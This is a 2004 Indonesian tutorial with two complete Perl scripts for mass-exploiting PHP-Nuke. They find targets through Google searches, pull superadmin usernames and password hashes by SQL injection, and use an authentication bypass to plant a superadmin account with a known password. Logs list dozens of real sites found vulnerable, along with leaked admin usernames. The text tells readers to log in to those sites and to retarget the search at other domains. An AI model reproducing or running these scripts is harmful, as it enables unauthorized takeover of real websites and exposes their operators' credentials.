/*********************************************************
 * Mass Scanning menggunakan perl script & google
 * pada hole terbaru PhpNuke.
 * 
 * Impact : PhpNuke version 6.x through 7.2 inclusive
 *
 * oleh    : iko (iko94@yahoo.com)
 * www.geocities.com/iko94
 *
 * release : may,19,2004
 *
 * No Warranty. This tutorial is for educational use only, 
 * commercial use is prohibited.
 *
 **********************************************************/


Sebelum kita mulai, anda bisa lihat-lihat referensi berikut:
1. PhpNuke Multiple Vulnerabilities (Downloads Module) 
(www.securiteam.com/unixfocus/5HP0F20CUK.html)
2. Admin-level authentication bypass in phpnuke 6.x-7.2 
(www.waraxe.us/?modname=sa&id=018)
3. [1st] MyGallery Vulnerability Scanner v1.1
(www.bosen.net/releases/?id=47)

Pada referensi di atas, dijelaskan tentang bug PhpNuke yang 
terbaru, yaitu bug pada Downloads Module dan sql superadmin level 
injection (silakan anda baca sendiri).
Pada kesempatan kali ini, kita akan melakukan mass scanning,
dengan menggunakan skrip perl original milik AresU (bosen.net).
Kita akan menggunakan dua skrip yang berbeda (tapi mirip), untuk
menscanning dua bug di atas.
Langsung aja kita sajikan skrip pertama :

++++++++++awal potong di sini++++++++++++++++++++++++++++++++++
#!/usr/bin/perl

use Socket;

$bosencekingjelek=<<END
PHPNuke SQL Injection Massal

Hasil : username
Password : cari sendiri !!!

use : $0 $1
contoh : $0 .co.id/modules.php
END
;
printlog($bosencekingjelek);

$fsav="gogphp.txt";
$log="goglephp.log";
#Support Proxy Server, change ip and port as u wish 
$port=8080;
$host="210.120.128.117";
$target = inet_aton($host);
$exp = "/modules.php?name=Downloads&d_op=viewsdownload&sid=-1%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0,0,0%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*";
$komponen=$ARGV[0];

#Read last session
open(hf,$fsav);
$lastsav=<hf>;
close(hf);
$check=1;#Check if any save session

$counter=0;
while(1)
{
$googleurl="http://www.google.com/search?q=allinurl:$komponen&num=50&hl=en&lr=&ie=UTF-8&oe=utf-8&start=$counter&sa=N";
$httppost="GET $googleurl HTTP/1.0\r\n\r\n";
@results=sendraw($httppost);
$data = join("",@results);
$counter=$counter+50;

exit if ($data=~/Google does not serve more than 1000/); #End Google search or Stop

@tmp=split(/\<p class\=g\>\<a href\=http\:\/\//,$data);
for ($a = 1; $a < $#tmp; $a++)
{
  @u=split(/\>/,$tmp[$a]);
  @t=split(/\/mod/,$u[0]);
  $url=$t[0];

  if (($lastsav ne "") && (!($lastsav =~ /$url/)) && $check)
  {
     next;
  } else
  {
     $check=0;
  }
  #Save Session
  open(hf,">$fsav");
  print hf $url;
  close(hf);
  
  printlog("Target: http://$url\t");
  $urltarget="$url$exp";
  $urltarget=~s/ /%20/g;
  $httppost="GET http://$urltarget HTTP/1.0\r\n\r\n";
  @results=sendraw($httppost);
  $strhasil = join("",@results);

  #Verify output
  #print $strhasil;
  if (!($strhasil=~/lid=0\"\>/))
  {
  printlog("Not Vulnerable\n");
  next;
  }
  #Verify if any shell banner
  @atmp=split(/lid=0\"\>/,$strhasil);
  @atmp=split(/\</,$atmp[1]);
  $banner=$atmp[0];
# $banner=~s/\n/\r\n/g;
  $p=length($banner);
  if ($p>0)
  {
  printlog("Vulnerable\n");
  printlog("$banner\n");
  }
  else
  {
  printlog("Possible-Vulnerable\n");
  }
#printlog("\n");
}
} #exit while
exit;

# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {   # this saves the whole transaction anyway
        my ($pstr)=@_;

        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
                
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;}
                select(STDOUT); close(S); return @in;
        }
}

sub printlog {
print @_[0];
open(lo,">>$log");
print lo @_[0];
close(lo);
return;
}
+++++++++akhir potong di sini+++++++++++++++++++++++

OK, simpan dengan nama php.pl dan jangan lupa :
$chmod +x php.pl
lalu jalankan dengan cara :
$./php.pl ".com/modules.php"
bla bla bla... (tunggu dengan sabar...)

$grep -v "Not Vulnerable" goglephp.log
Target: http://www.opensourcecms.com    Vulnerable
opensourcecms
Target: http://e-paper.elmit.com        Vulnerable
ronald
Target: http://www.fxguide.com  Vulnerable
Report Broken Link
Target: http://www.bvalphaserver.com    Vulnerable
Administrator
Target: http://www.3r-marketing.com     Vulnerable
3rmarketing
Target: http://www.bvalphaserver.com    Vulnerable
Administrator
Target: http://preciogasolina.com       Vulnerable
PrecioGasolina
Target: http://www.cafeduweb.com        Vulnerable
frogy68
Target: http://www.cafeduweb.com        Vulnerable
frogy68
Target: http://soft.vip600.com  Vulnerable
vip600
Target: http://soft.vip600.com  Vulnerable
vip600
Target: http://www.ps3insider.com       Vulnerable
Supernova
Target: http://www.cafeduweb.com        Vulnerable
frogy68
Target: http://www.dnavaccine.com       Vulnerable
Administrator
Target: http://www.unrealdemolition.com Vulnerable
Fooman
Target: http://www.truthortradition.com Vulnerable
webmaster
Target: http://www.patternscentral.com  Vulnerable
dkaufman
Target: http://verificationguild.com    Vulnerable
Janick
Target: http://www.geotrail-corp.com    Vulnerable
GeoTrail
Target: http://www.hosting-4you.com     Vulnerable
kicken
Target: http://www.game-times.com       Vulnerable
Harlequin
Target: http://www.game-times.com       Vulnerable
Harlequin
Target: http://preciogasolina.com       Vulnerable
PrecioGasolina
Target: http://www.nitemyste.com        Vulnerable
NiteMyste
Target: http://www.emaculation.com      Vulnerable
MeanE
Target: http://www.hageeks.com  Vulnerable
webmaster
Target: http://nuke.vipixel.com Vulnerable
brumie
Target: http://dnavaccine.com   Vulnerable
Administrator
Target: http://www.monster-hardware.com Vulnerable
jim
Target: http://dnavaccine.com   Vulnerable
Administrator
Target: http://www.monster-hardware.com Vulnerable
jim
Target: http://www.fxguide.com  Vulnerable
Report Broken Link
Target: http://www.shukwit.com  Vulnerable
gordo
Target: http://dnavaccine.com   Vulnerable
Administrator
Target: http://www.monster-hardware.com Vulnerable
jim
Target: http://permacultura.webcindario.com     Vulnerable
mcarmona
Target: http://permacultura.webcindario.com     Vulnerable
mcarmona
Target: http://permacultura.webcindario.com     Vulnerable
mcarmona
Target: http://permacultura.webcindario.com     Vulnerable
mcarmona
Target: http://permacultura.webcindario.com     Vulnerable
mcarmona
Target: http://permacultura.webcindario.com     Vulnerable
mcarmona
Target: http://permacultura.webcindario.com     Vulnerable
mcarmona
Target: http://permacultura.webcindario.com     Vulnerable
mcarmona

Gotcha !!!
Ternyata banyak juga yang belum di-patch.
Kelanjutannya, anda bisa buka di browser anda sendiri,
contoh :
www.opensourcecms.com/modules.php?name=Downloads&d_op=viewsdownload&sid=-1%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0,0,0%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
nah akan keliatan user dan hash passwordnya.

Selanjutnya skrip ke dua:
+++++++++++awal potong di sini+++++++++++++++++++++++++
#!/usr/bin/perl

use Socket;

$bosencekingjelek=<<END
PHPNuke SQL Injection Massal

Hasil : insert Username & Password 

use : $0 $1
contoh : $0 ".co.id/modules.php"
END
;
printlog($bosencekingjelek);

$fsav="gogphp1.txt";
$log="goglephp1.log";
#Support Proxy Server, change ip and port as u wish 
$port=8080;
$host="210.120.128.117";
$target = inet_aton($host);
$exp = "/admin.php?op=AddAuthor&add_aid=bima&add_name=God&add_pwd=passrahasia&add_email=foo@bar.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox";
$komponen=$ARGV[0];

#Read last session
open(hf,$fsav);
$lastsav=<hf>;
close(hf);
$check=1;#Check if any save session

$counter=0;
while(1)
{
$googleurl="http://www.google.com/search?q=allinurl:$komponen&num=50&hl=en&lr=&ie=UTF-8&oe=utf-8&start=$counter&sa=N";
$httppost="GET $googleurl HTTP/1.0\r\n\r\n";
@results=sendraw($httppost);
$data = join("",@results);
$counter=$counter+50;

exit if ($data=~/Google does not serve more than 1000/); #End Google search or Stop

@tmp=split(/\<p class\=g\>\<a href\=http\:\/\//,$data);
for ($a = 1; $a < $#tmp; $a++)
{
  @u=split(/\>/,$tmp[$a]);
  @t=split(/\/mod/,$u[0]);
  $url=$t[0];

  if (($lastsav ne "") && (!($lastsav =~ /$url/)) && $check)
  {
     next;
  } else
  {
     $check=0;
  }
  #Save Session
  open(hf,">$fsav");
  print hf $url;
  close(hf);
  
  printlog("Target: http://$url\t");
  $urltarget="$url$exp";
  $urltarget=~s/ /%20/g;
  $httppost="GET http://$urltarget HTTP/1.0\r\n\r\n";
  @results=sendraw($httppost);
  $strhasil = join("",@results);

  #Verify output
  #print $strhasil;
  if (!($strhasil=~/admin.php/))
  {
  printlog("Not Vulnerable\n");
  next;
  } elsif ($strhasil=~/404/)
  {
  printlog("Not Vulnerable\n");
  next;
  } else 
  {
  printlog("Vulnerable++++++++\n");
  }
  
#printlog("\n");
}
} #exit while
exit;

# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {   # this saves the whole transaction anyway
        my ($pstr)=@_;

        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
                
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;}
                select(STDOUT); close(S); return @in;
        }
}

sub printlog {
print @_[0];
open(lo,">>$log");
print lo @_[0];
close(lo);
return;
}
+++++++++++++akhir potong di sini+++++++++++++++++++++++++++

Simpan skrip ke dua dengan nama phpinsert.pl
$chmod +x phpinsert.pl
lalu jalankan :
$./phpinsert.pl ".com/modules.php"
bla bla bla... (tunggu juga dengan sabar...)

$grep -e "Vulnerable++++++++" goglephp1.log
Target: http://www.radioprune.com       Vulnerable++++++++
Target: http://www.windowscrash.com     Vulnerable++++++++
Target: http://www.rentalserviceukraine.com     Vulnerable++++++++
Target: http://www.hardwaregeeks.com    Vulnerable++++++++
Target: http://www.mdaddons.com Vulnerable++++++++
Target: http://www.halo50k3.com Vulnerable++++++++
Target: http://www.3r-marketing.com     Vulnerable++++++++
Target: http://www.nukesecurity.com     Vulnerable++++++++
Target: http://www.hbccufo.com  Vulnerable++++++++
Target: http://www.custommonster.com    Vulnerable++++++++
Target: http://www.jewish.com   Vulnerable++++++++
Target: http://www.jewish.com   Vulnerable++++++++
Target: http://gt.audioslaved.com       Vulnerable++++++++
Target: http://www.quintadimension.com  Vulnerable++++++++
Target: http://www.hackwire.com Vulnerable++++++++
Target: http://www.nukesecurity.com     Vulnerable++++++++
Target: http://www.teamhardware.com     Vulnerable++++++++
Target: http://phyrexia77.webcindario.com       Vulnerable++++++++
Target: http://www.pharmechange.com     Vulnerable++++++++
Target: http://soft.vip600.com  Vulnerable++++++++
Target: http://soft.vip600.com  Vulnerable++++++++
Target: http://www.techzonez.com        Vulnerable++++++++
Target: http://www.rpgmp3.com   Vulnerable++++++++
Target: http://www.unrealdemolition.com Vulnerable++++++++
Target: http://www.truthortradition.com Vulnerable++++++++
Target: http://www.smartdykes.com       Vulnerable++++++++
Target: http://www.artdela.com  Vulnerable++++++++
Target: http://www.jokecrazy.com        Vulnerable++++++++
Target: http://www.jokecrazy.com        Vulnerable++++++++
Target: http://www.configurarequipos.com        Vulnerable++++++++
Target: http://www.phatmojo.com Vulnerable++++++++
Target: http://www.eve-db.com   Vulnerable++++++++
Target: http://www.hosting-4you.com     Vulnerable++++++++
Target: http://www.financeoutlook.com   Vulnerable++++++++
Target: http://www.blackdefrance.com    Vulnerable++++++++
Target: http://sfbook.com       Vulnerable++++++++
Target: http://www.hardwaregeeks.com    Vulnerable++++++++
Target: http://blizzplanet.com  Vulnerable++++++++
Target: http://www.leperstv.com Vulnerable++++++++
Target: http://www.innovationsfoundation.com    Vulnerable++++++++
Target: http://www.omerya.com   Vulnerable++++++++
Target: http://www.emaculation.com      Vulnerable++++++++
Target: http://www.hageeks.com  Vulnerable++++++++
Target: http://www.directwest.com       Vulnerable++++++++
Target: http://www.nukeskins.com        Vulnerable++++++++
Target: http://www.chicagolambdas.com   Vulnerable++++++++
Target: http://featuredsquad.com        Vulnerable++++++++
Target: http://www.nukeskins.com        Vulnerable++++++++
Target: http://www.chicagolambdas.com   Vulnerable++++++++
Target: http://www.exerciseforums.com   Vulnerable++++++++
Target: http://www.viajeros.com Vulnerable++++++++
Target: http://www.nukeskins.com        Vulnerable++++++++
Target: http://www.paradoxpoetry.com    Vulnerable++++++++
Target: http://softastur.webcindario.com        Vulnerable++++++++
Target: http://ebrencs.webcindario.com  Vulnerable++++++++
Target: http://permacultura.webcindario.com     Vulnerable++++++++
Target: http://portail-beaute.webcindario.com   Vulnerable++++++++
Target: http://letrashumanas.webcindario.com    Vulnerable++++++++
Target: http://www.u2dot.com    Vulnerable++++++++

Gotcha juga !!!
Ini lebih banyak lagi... :))
Selanjutnya, anda bisa masuk ke situs yang vulner, dan login
sebagai superadmin dengan user bima dan passwordnya passrahasia
contoh :
www.u2dot.com/admin.php
user : bima
pass : passrahasia

catatan: memang ada beberapa kesalahan pada regex di skrip,
tapi secara keseluruhan, skrip ini bekerja dengan baik.  :)
Awas !!! Jangan melakukan tindakan yang merugikan orang lain !

Tips :
anda bisa mengubah pattern pencariannya sesuai dengan 
kehendak anda sendiri.
contoh :
$./php.pl ".co.id/modules.php"
$./phpinsert.pl ".or.id/modules.php"
atau whatever lah, terserah anda...  :)
asalkan pattern itu menargetkan situs-situs yang menjalankan
PHPNuke di dalamnya.

SPECIAL thanks to :
[+] www.bosen.net
[+] www.neoteker.or.id
[+] All people in #neoteker (ftp_geo,zka,eap,fuzke,alphacentupret,alarix,boeboe, etc, etc)
[+] All people in #1stlink

TODO:
[*] Fix unknow error at regex

iko berterimakasih kepada:
[+] qq
[+] tiyox
[+] keputih group
[+] everyone who shouting the freedom

iko tidak berterimakasih kepada:
[-] monopoli
[-] birokrasi
[-] para penjilat
[-] koruptor
[-] closed source

[EOF]